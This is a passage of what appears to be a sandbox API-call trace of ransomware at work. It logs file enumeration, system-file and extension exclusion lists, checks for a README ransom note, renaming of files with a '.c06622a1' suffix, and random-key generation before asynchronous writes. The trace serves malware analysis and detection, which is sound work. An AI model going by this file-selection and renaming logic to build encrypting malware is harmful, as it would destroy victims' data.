(_String="icns") returned 0x4 [0150.109] _wcsicmp (_Str1="ico", _Str2="url") returned -12 [0150.109] wcslen (_String="ico") returned 0x3 [0150.109] _wcsicmp (_Str1="ics", _Str2="url") returned -12 [0150.109] wcslen (_String="ics") returned 0x3 [0150.109] _wcsicmp (_Str1="idx", _Str2="url") returned -12 [0150.109] wcslen (_String="idx") returned 0x3 [0150.109] _wcsicmp (_Str1="ldf", _Str2="url") returned -9 [0150.109] wcslen (_String="ldf") returned 0x3 [0150.109] _wcsicmp (_Str1="lnk", _Str2="url") returned -9 [0150.109] wcslen (_String="lnk") returned 0x3 [0150.109] _wcsicmp (_Str1="mod", _Str2="url") returned -8 [0150.109] wcslen (_String="mod") returned 0x3 [0150.109] _wcsicmp (_Str1="mpa", _Str2="url") returned -8 [0150.109] wcslen (_String="mpa") returned 0x3 [0150.109] _wcsicmp (_Str1="msc", _Str2="url") returned -8 [0150.109] wcslen (_String="msc") returned 0x3 [0150.109] _wcsicmp (_Str1="msp", _Str2="url") returned -8 [0150.109] wcslen (_String="msp") returned 0x3 [0150.109] _wcsicmp (_Str1="msstyles", _Str2="url") returned -8 [0150.109] wcslen (_String="msstyles") returned 0x8 [0150.109] _wcsicmp (_Str1="msu", _Str2="url") returned -8 [0150.109] wcslen (_String="msu") returned 0x3 [0150.109] _wcsicmp (_Str1="nls", _Str2="url") returned -7 [0150.109] wcslen (_String="nls") returned 0x3 [0150.109] _wcsicmp (_Str1="nomedia", _Str2="url") returned -7 [0150.109] wcslen (_String="nomedia") returned 0x7 [0150.109] _wcsicmp (_Str1="ocx", _Str2="url") returned -6 [0150.109] wcslen (_String="ocx") returned 0x3 [0150.110] _wcsicmp (_Str1="prf", _Str2="url") returned -5 [0150.110] wcslen (_String="prf") returned 0x3 [0150.110] _wcsicmp (_Str1="ps1", _Str2="url") returned -5 [0150.110] wcslen (_String="ps1") returned 0x3 [0150.110] _wcsicmp (_Str1="rom", _Str2="url") returned -3 [0150.110] wcslen (_String="rom") returned 0x3 [0150.110] _wcsicmp (_Str1="rtp", _Str2="url") returned -3 [0150.110] wcslen (_String="rtp") returned 0x3 [0150.110] _wcsicmp (_Str1="scr", _Str2="url") returned -2 [0150.110] wcslen (_String="scr") returned 0x3 [0150.110] _wcsicmp (_Str1="shs", _Str2="url") returned -2 [0150.110] wcslen (_String="shs") returned 0x3 [0150.110] _wcsicmp (_Str1="spl", _Str2="url") returned -2 [0150.110] wcslen (_String="spl") returned 0x3 [0150.110] _wcsicmp (_Str1="sys", _Str2="url") returned -2 [0150.110] wcslen (_String="sys") returned 0x3 [0150.110] _wcsicmp (_Str1="theme", _Str2="url") returned -1 [0150.110] wcslen (_String="theme") returned 0x5 [0150.110] _wcsicmp (_Str1="themepack", _Str2="url") returned -1 [0150.110] wcslen (_String="themepack") returned 0x9 [0150.110] _wcsicmp (_Str1="wpx", _Str2="url") returned 2 [0150.110] wcslen (_String="wpx") returned 0x3 [0150.110] _wcsicmp (_Str1="lock", _Str2="url") returned -9 [0150.110] wcslen (_String="lock") returned 0x4 [0150.110] _wcsicmp (_Str1="key", _Str2="url") returned -10 [0150.110] wcslen (_String="key") returned 0x3 [0150.110] _wcsicmp (_Str1="hta", _Str2="url") returned -13 [0150.110] wcslen (_String="hta") returned 0x3 [0150.110] _wcsicmp (_Str1="msi", _Str2="url") returned -8 [0150.110] wcslen (_String="msi") returned 0x3 [0150.110] _wcsicmp (_Str1="pdb", _Str2="url") returned -5 [0150.110] wcslen (_String="pdb") returned 0x3 [0150.110] _wcsicmp (_Str1="sql", _Str2="url") returned -2 [0150.110] wcslen (_String="sql") returned 0x3 [0150.110] _wcsicmp (_Str1="sqlite", _Str2="url") returned -2 [0150.110] wcslen (_String="sqlite") returned 0x6 [0150.110] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites")) returned 0x10 [0150.111] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x4500090 [0150.111] wcscpy (in: _Dest=0x4500090, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites" [0150.111] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites") returned 0x3e [0150.111] wcscpy (in: _Dest=0x450010e, _Source="Microsoft At Home.url" | out: _Dest="Microsoft At Home.url") returned="Microsoft At Home.url" [0150.111] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Home.url", dwFileAttributes=0x80) returned 1 [0150.111] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Home.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\microsoft at home.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x664 [0150.111] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 0 [0150.111] CloseHandle (hObject=0x664) returned 1 [0150.111] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x4510098 [0150.111] wcscpy (in: _Dest=0x4510098, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Home.url" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Home.url") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Home.url" [0150.111] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Home.url") returned 0x54 [0150.111] wcscpy (in: _Dest=0x4510140, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0150.111] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Home.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\microsoft at home.url"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Home.url.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\microsoft at home.url.c06622a1"), dwFlags=0x8) returned 1 [0150.113] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Home.url.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\microsoft at home.url.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x664 [0150.113] CreateIoCompletionPort (FileHandle=0x664, ExistingCompletionPort=0x5e0, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x5e0 [0150.113] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x80104) returned 0x4280020 [0150.119] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x270281dd [0150.119] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x5fe006b3 [0150.119] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x780528e3 [0150.119] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x60ccef4b [0150.119] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x5e92c12a [0150.119] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x7a2fb3b4 [0150.119] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x209a03dc [0150.119] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0xa749359 [0150.122] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x4280094, Length=0x80) returned 0x7ba5017b [0150.122] RtlComputeCrc32 (PartialCrc=0x17b, Buffer=0x4280094, Length=0x80) returned 0xf6b37625 [0150.122] RtlComputeCrc32 (PartialCrc=0x7625, Buffer=0x4280094, Length=0x80) returned 0x8fc3389d [0150.122] RtlComputeCrc32 (PartialCrc=0x389d, Buffer=0x4280094, Length=0x80) returned 0x9699594a [0150.122] RtlComputeCrc32 (PartialCrc=0x594a, Buffer=0x4280094, Length=0x80) returned 0x5b359ce0 [0150.122] PostQueuedCompletionStatus (CompletionPort=0x5e0, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x4280020) returned 1 [0150.123] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4500090) returned 1 [0150.123] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4510098) returned 1 [0150.123] FindNextFileW (in: hFindFile=0x2db8780, lpFindFileData=0x3fea6c | out: lpFindFileData=0x3fea6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft At Work.url", cAlternateFileName="MICROS~2.URL")) returned 1 [0150.123] _wcsicmp (_Str1="Microsoft At Work.url", _Str2="README.c06622a1.TXT") returned -5 [0150.123] wcsstr (_Str="Microsoft At Work.url", _SubStr="README") returned 0x0 [0150.123] _wcsicmp (_Str1="autorun.inf", _Str2="Microsoft At Work.url") returned -12 [0150.123] wcslen (_String="autorun.inf") returned 0xb [0150.123] _wcsicmp (_Str1="boot.ini", _Str2="Microsoft At Work.url") returned -11 [0150.123] wcslen (_String="boot.ini") returned 0x8 [0150.123] _wcsicmp (_Str1="bootfont.bin", _Str2="Microsoft At Work.url") returned -11 [0150.123] wcslen (_String="bootfont.bin") returned 0xc [0150.123] _wcsicmp (_Str1="bootsect.bak", _Str2="Microsoft At Work.url") returned -11 [0150.123] wcslen (_String="bootsect.bak") returned 0xc [0150.123] _wcsicmp (_Str1="desktop.ini", _Str2="Microsoft At Work.url") returned -9 [0150.123] wcslen (_String="desktop.ini") returned 0xb [0150.123] _wcsicmp (_Str1="iconcache.db", _Str2="Microsoft At Work.url") returned -4 [0150.123] wcslen (_String="iconcache.db") returned 0xc [0150.123] _wcsicmp (_Str1="ntldr", _Str2="Microsoft At Work.url") returned 1 [0150.123] wcslen (_String="ntldr") returned 0x5 [0150.123] _wcsicmp (_Str1="ntuser.dat", _Str2="Microsoft At Work.url") returned 1 [0150.123] wcslen (_String="ntuser.dat") returned 0xa [0150.123] _wcsicmp (_Str1="ntuser.dat.log", _Str2="Microsoft At Work.url") returned 1 [0150.123] wcslen (_String="ntuser.dat.log") returned 0xe [0150.123] _wcsicmp (_Str1="ntuser.ini", _Str2="Microsoft At Work.url") returned 1 [0150.123] wcslen (_String="ntuser.ini") returned 0xa [0150.123] _wcsicmp (_Str1="thumbs.db", _Str2="Microsoft At Work.url") returned 7 [0150.123] wcslen (_String="thumbs.db") returned 0x9 [0150.123] _wcsicmp (_Str1="386", _Str2="url") returned -66 [0150.123] wcslen (_String="386") returned 0x3 [0150.123] _wcsicmp (_Str1="adv", _Str2="url") returned -20 [0150.123] wcslen (_String="adv") returned 0x3 [0150.123] _wcsicmp (_Str1="ani", _Str2="url") returned -20 [0150.123] wcslen (_String="ani") returned 0x3 [0150.123] _wcsicmp (_Str1="bat", _Str2="url") returned -19 [0150.123] wcslen (_String="bat") returned 0x3 [0150.124] _wcsicmp (_Str1="bin", _Str2="url") returned -19 [0150.124] wcslen (_String="bin") returned 0x3 [0150.124] _wcsicmp (_Str1="cab", _Str2="url") returned -18 [0150.124] wcslen (_String="cab") returned 0x3 [0150.124] _wcsicmp (_Str1="cmd", _Str2="url") returned -18 [0150.124] wcslen (_String="cmd") returned 0x3 [0150.124] _wcsicmp (_Str1="com", _Str2="url") returned -18 [0150.124] wcslen (_String="com") returned 0x3 [0150.124] _wcsicmp (_Str1="cpl", _Str2="url") returned -18 [0150.124] wcslen (_String="cpl") returned 0x3 [0150.124] _wcsicmp (_Str1="cur", _Str2="url") returned -18 [0150.124] wcslen (_String="cur") returned 0x3 [0150.124] _wcsicmp (_Str1="deskthemepack", _Str2="url") returned -17 [0150.124] wcslen (_String="deskthemepack") returned 0xd [0150.124] _wcsicmp (_Str1="diagcab", _Str2="url") returned -17 [0150.124] wcslen (_String="diagcab") returned 0x7 [0150.124] _wcsicmp (_Str1="diagcfg", _Str2="url") returned -17 [0150.124] wcslen (_String="diagcfg") returned 0x7 [0150.124] _wcsicmp (_Str1="diagpkg", _Str2="url") returned -17 [0150.124] wcslen (_String="diagpkg") returned 0x7 [0150.124] _wcsicmp (_Str1="dll", _Str2="url") returned -17 [0150.124] wcslen (_String="dll") returned 0x3 [0150.124] _wcsicmp (_Str1="drv", _Str2="url") returned -17 [0150.124] wcslen (_String="drv") returned 0x3 [0150.124] _wcsicmp (_Str1="exe", _Str2="url") returned -16 [0150.124] wcslen (_String="exe") returned 0x3 [0150.124] _wcsicmp (_Str1="hlp", _Str2="url") returned -13 [0150.124] wcslen (_String="hlp") returned 0x3 [0150.124] _wcsicmp (_Str1="icl", _Str2="url") returned -12 [0150.124] wcslen (_String="icl") returned 0x3 [0150.124] _wcsicmp (_Str1="icns", _Str2="url") returned -12 [0150.124] wcslen (_String="icns") returned 0x4 [0150.124] _wcsicmp (_Str1="ico", _Str2="url") returned -12 [0150.124] wcslen (_String="ico") returned 0x3 [0150.124] _wcsicmp (_Str1="ics", _Str2="url") returned -12 [0150.124] wcslen (_String="ics") returned 0x3 [0150.124] _wcsicmp (_Str1="idx", _Str2="url") returned -12 [0150.124] wcslen (_String="idx") returned 0x3 [0150.125] _wcsicmp (_Str1="ldf", _Str2="url") returned -9 [0150.125] wcslen (_String="ldf") returned 0x3 [0150.125] _wcsicmp (_Str1="lnk", _Str2="url") returned -9 [0150.125] wcslen (_String="lnk") returned 0x3 [0150.125] _wcsicmp (_Str1="mod", _Str2="url") returned -8 [0150.125] wcslen (_String="mod") returned 0x3 [0150.125] _wcsicmp (_Str1="mpa", _Str2="url") returned -8 [0150.125] wcslen (_String="mpa") returned 0x3 [0150.125] _wcsicmp (_Str1="msc", _Str2="url") returned -8 [0150.125] wcslen (_String="msc") returned 0x3 [0150.125] _wcsicmp (_Str1="msp", _Str2="url") returned -8 [0150.125] wcslen (_String="msp") returned 0x3 [0150.125] _wcsicmp (_Str1="msstyles", _Str2="url") returned -8 [0150.125] wcslen (_String="msstyles") returned 0x8 [0150.125] _wcsicmp (_Str1="msu", _Str2="url") returned -8 [0150.125] wcslen (_String="msu") returned 0x3 [0150.125] _wcsicmp (_Str1="nls", _Str2="url") returned -7 [0150.125] wcslen (_String="nls") returned 0x3 [0150.125] _wcsicmp (_Str1="nomedia", _Str2="url") returned -7 [0150.125] wcslen (_String="nomedia") returned 0x7 [0150.125] _wcsicmp (_Str1="ocx", _Str2="url") returned -6 [0150.125] wcslen (_String="ocx") returned 0x3 [0150.125] _wcsicmp (_Str1="prf", _Str2="url") returned -5 [0150.125] wcslen (_String="prf") returned 0x3 [0150.125] _wcsicmp (_Str1="ps1", _Str2="url") returned -5 [0150.125] wcslen (_String="ps1") returned 0x3 [0150.125] _wcsicmp (_Str1="rom", _Str2="url") returned -3 [0150.125] wcslen (_String="rom") returned 0x3 [0150.125] _wcsicmp (_Str1="rtp", _Str2="url") returned -3 [0150.125] wcslen (_String="rtp") returned 0x3 [0150.125] _wcsicmp (_Str1="scr", _Str2="url") returned -2 [0150.125] wcslen (_String="scr") returned 0x3 [0150.125] _wcsicmp (_Str1="shs", _Str2="url") returned -2 [0150.125] wcslen (_String="shs") returned 0x3 [0150.125] _wcsicmp (_Str1="spl", _Str2="url") returned -2 [0150.125] wcslen (_String="spl") returned 0x3 [0150.125] _wcsicmp (_Str1="sys", _Str2="url") returned -2 [0150.125] wcslen (_String="sys") returned 0x3 [0150.125] _wcsicmp (_Str1="theme", _Str2="url") returned -1 [0150.126] wcslen (_String="theme") returned 0x5 [0150.126] _wcsicmp (_Str1="themepack", _Str2="url") returned -1 [0150.126] wcslen (_String="themepack") returned 0x9 [0150.126] _wcsicmp (_Str1="wpx", _Str2="url") returned 2 [0150.126] wcslen (_String="wpx") returned 0x3 [0150.126] _wcsicmp (_Str1="lock", _Str2="url") returned -9 [0150.126] wcslen (_String="lock") returned 0x4 [0150.126] _wcsicmp (_Str1="key", _Str2="url") returned -10 [0150.126] wcslen (_String="key") returned 0x3 [0150.126] _wcsicmp (_Str1="hta", _Str2="url") returned -13 [0150.126] wcslen (_String="hta") returned 0x3 [0150.126] _wcsicmp (_Str1="msi", _Str2="url") returned -8 [0150.126] wcslen (_String="msi") returned 0x3 [0150.126] _wcsicmp (_Str1="pdb", _Str2="url") returned -5 [0150.126] wcslen (_String="pdb") returned 0x3 [0150.126] _wcsicmp (_Str1="sql", _Str2="url") returned -2 [0150.126] wcslen (_String="sql") returned 0x3 [0150.126] _wcsicmp (_Str1="sqlite", _Str2="url") returned -2 [0150.126] wcslen (_String="sqlite") returned 0x6 [0150.126] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites")) returned 0x10 [0150.126] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x4500090 [0150.126] wcscpy (in: _Dest=0x4500090, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites" [0150.126] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites") returned 0x3e [0150.126] wcscpy (in: _Dest=0x450010e, _Source="Microsoft At Work.url" | out: _Dest="Microsoft At Work.url") returned="Microsoft At Work.url" [0150.126] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Work.url", dwFileAttributes=0x80) returned 1 [0150.126] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Work.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\microsoft at work.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x65c [0150.127] SetFilePointerEx (in: hFile=0x65c, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 0 [0150.127] CloseHandle (hObject=0x65c) returned 1 [0150.127] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x4510098 [0150.127] wcscpy (in: _Dest=0x4510098, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Work.url" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Work.url") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Work.url" [0150.127] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Work.url") returned 0x54 [0150.127] wcscpy (in: _Dest=0x4510140, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0150.127] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Work.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\microsoft at work.url"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Work.url.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\microsoft at work.url.c06622a1"), dwFlags=0x8) returned 1 [0150.129] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Work.url.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\microsoft at work.url.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x65c [0150.129] CreateIoCompletionPort (FileHandle=0x65c, ExistingCompletionPort=0x5dc, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x5dc [0150.129] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x80104) returned 0x4670020 [0150.134] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x2c3f38a9 [0150.134] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x7766afc0 [0150.134] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x2bd2c596 [0150.134] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x47f10e1b [0150.134] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x35edfdd [0150.134] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x75ad06d9 [0150.134] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x50b089eb [0150.134] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0xc5f4a5d [0150.137] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x4670094, Length=0x80) returned 0x6b8fa0a2 [0150.138] RtlComputeCrc32 (PartialCrc=0xa0a2, Buffer=0x4670094, Length=0x80) returned 0xbe212034 [0150.138] RtlComputeCrc32 (PartialCrc=0x2034, Buffer=0x4670094, Length=0x80) returned 0xa9672c55 [0150.138] RtlComputeCrc32 (PartialCrc=0x2c55, Buffer=0x4670094, Length=0x80) returned 0xe524861d [0150.138] RtlComputeCrc32 (PartialCrc=0x861d, Buffer=0x4670094, Length=0x80) returned 0xba7c32cb [0150.138] PostQueuedCompletionStatus (CompletionPort=0x5dc, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x4670020) returned 1 [0150.138] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4500090) returned 1 [0150.138] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4510098) returned 1 [0150.138] FindNextFileW (in: hFindFile=0x2db8780, lpFindFileData=0x3fea6c | out: lpFindFileData=0x3fea6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d8930c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x86, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft Store.url", cAlternateFileName="MICROS~1.URL")) returned 1 [0150.138] _wcsicmp (_Str1="Microsoft Store.url", _Str2="README.c06622a1.TXT") returned -5 [0150.138] wcsstr (_Str="Microsoft Store.url", _SubStr="README") returned 0x0 [0150.138] _wcsicmp (_Str1="autorun.inf", _Str2="Microsoft Store.url") returned -12 [0150.138] wcslen (_String="autorun.inf") returned 0xb [0150.138] _wcsicmp (_Str1="boot.ini", _Str2="Microsoft Store.url") returned -11 [0150.138] wcslen (_String="boot.ini") returned 0x8 [0150.138] _wcsicmp (_Str1="bootfont.bin", _Str2="Microsoft Store.url") returned -11 [0150.138] wcslen (_String="bootfont.bin") returned 0xc [0150.138] _wcsicmp (_Str1="bootsect.bak", _Str2="Microsoft Store.url") returned -11 [0150.138] wcslen (_String="bootsect.bak") returned 0xc [0150.138] _wcsicmp (_Str1="desktop.ini", _Str2="Microsoft Store.url") returned -9 [0150.138] wcslen (_String="desktop.ini") returned 0xb [0150.138] _wcsicmp (_Str1="iconcache.db", _Str2="Microsoft Store.url") returned -4 [0150.138] wcslen (_String="iconcache.db") returned 0xc [0150.138] _wcsicmp (_Str1="ntldr", _Str2="Microsoft Store.url") returned 1 [0150.138] wcslen (_String="ntldr") returned 0x5 [0150.138] _wcsicmp (_Str1="ntuser.dat", _Str2="Microsoft Store.url") returned 1 [0150.138] wcslen (_String="ntuser.dat") returned 0xa [0150.138] _wcsicmp (_Str1="ntuser.dat.log", _Str2="Microsoft Store.url") returned 1 [0150.138] wcslen (_String="ntuser.dat.log") returned 0xe [0150.138] _wcsicmp (_Str1="ntuser.ini", _Str2="Microsoft Store.url") returned 1 [0150.138] wcslen (_String="ntuser.ini") returned 0xa [0150.138] _wcsicmp (_Str1="thumbs.db", _Str2="Microsoft Store.url") returned 7 [0150.138] wcslen (_String="thumbs.db") returned 0x9 [0150.138] _wcsicmp (_Str1="386", _Str2="url") returned -66 [0150.138] wcslen (_String="386") returned 0x3 [0150.139] _wcsicmp (_Str1="adv", _Str2="url") returned -20 [0150.139] wcslen (_String="adv") returned 0x3 [0150.139] _wcsicmp (_Str1="ani", _Str2="url") returned -20 [0150.139] wcslen (_String="ani") returned 0x3 [0150.139] _wcsicmp (_Str1="bat", _Str2="url") returned -19 [0150.139] wcslen (_String="bat") returned 0x3 [0150.139] _wcsicmp (_Str1="bin", _Str2="url") returned -19 [0150.139] wcslen (_String="bin") returned 0x3 [0150.139] _wcsicmp (_Str1="cab", _Str2="url") returned -18 [0150.139] wcslen (_String="cab") returned 0x3 [0150.139] _wcsicmp (_Str1="cmd", _Str2="url") returned -18 [0150.139] wcslen (_String="cmd") returned 0x3 [0150.139] _wcsicmp (_Str1="com", _Str2="url") returned -18 [0150.139] wcslen (_String="com") returned 0x3 [0150.139] _wcsicmp (_Str1="cpl", _Str2="url") returned -18 [0150.139] wcslen (_String="cpl") returned 0x3 [0150.139] _wcsicmp (_Str1="cur", _Str2="url") returned -18 [0150.139] wcslen (_String="cur") returned 0x3 [0150.139] _wcsicmp (_Str1="deskthemepack", _Str2="url") returned -17 [0150.139] wcslen (_String="deskthemepack") returned 0xd [0150.139] _wcsicmp (_Str1="diagcab", _Str2="url") returned -17 [0150.139] wcslen (_String="diagcab") returned 0x7 [0150.139] _wcsicmp (_Str1="diagcfg", _Str2="url") returned -17 [0150.139] wcslen (_String="diagcfg") returned 0x7 [0150.139] _wcsicmp (_Str1="diagpkg", _Str2="url") returned -17 [0150.139] wcslen (_String="diagpkg") returned 0x7 [0150.139] _wcsicmp (_Str1="dll", _Str2="url") returned -17 [0150.139] wcslen (_String="dll") returned 0x3 [0150.139] _wcsicmp (_Str1="drv", _Str2="url") returned -17 [0150.139] wcslen (_String="drv") returned 0x3 [0150.139] _wcsicmp (_Str1="exe", _Str2="url") returned -16 [0150.139] wcslen (_String="exe") returned 0x3 [0150.139] _wcsicmp (_Str1="hlp", _Str2="url") returned -13 [0150.139] wcslen (_String="hlp") returned 0x3 [0150.139] _wcsicmp (_Str1="icl", _Str2="url") returned -12 [0150.139] wcslen (_String="icl") returned 0x3 [0150.139] _wcsicmp (_Str1="icns", _Str2="url") returned -12 [0150.139] wcslen (_String="icns") returned 0x4 [0150.139] _wcsicmp (_Str1="ico", _Str2="url") returned -12 [0150.140] wcslen (_String="ico") returned 0x3 [0150.140] _wcsicmp (_Str1="ics", _Str2="url") returned -12 [0150.140] wcslen (_String="ics") returned 0x3 [0150.140] _wcsicmp (_Str1="idx", _Str2="url") returned -12 [0150.140] wcslen (_String="idx") returned 0x3 [0150.140] _wcsicmp (_Str1="ldf", _Str2="url") returned -9 [0150.140] wcslen (_String="ldf") returned 0x3 [0150.140] _wcsicmp (_Str1="lnk", _Str2="url") returned -9 [0150.140] wcslen (_String="lnk") returned 0x3 [0150.140] _wcsicmp (_Str1="mod", _Str2="url") returned -8 [0150.140] wcslen (_String="mod") returned 0x3 [0150.140] _wcsicmp (_Str1="mpa", _Str2="url") returned -8 [0150.140] wcslen (_String="mpa") returned 0x3 [0150.140] _wcsicmp 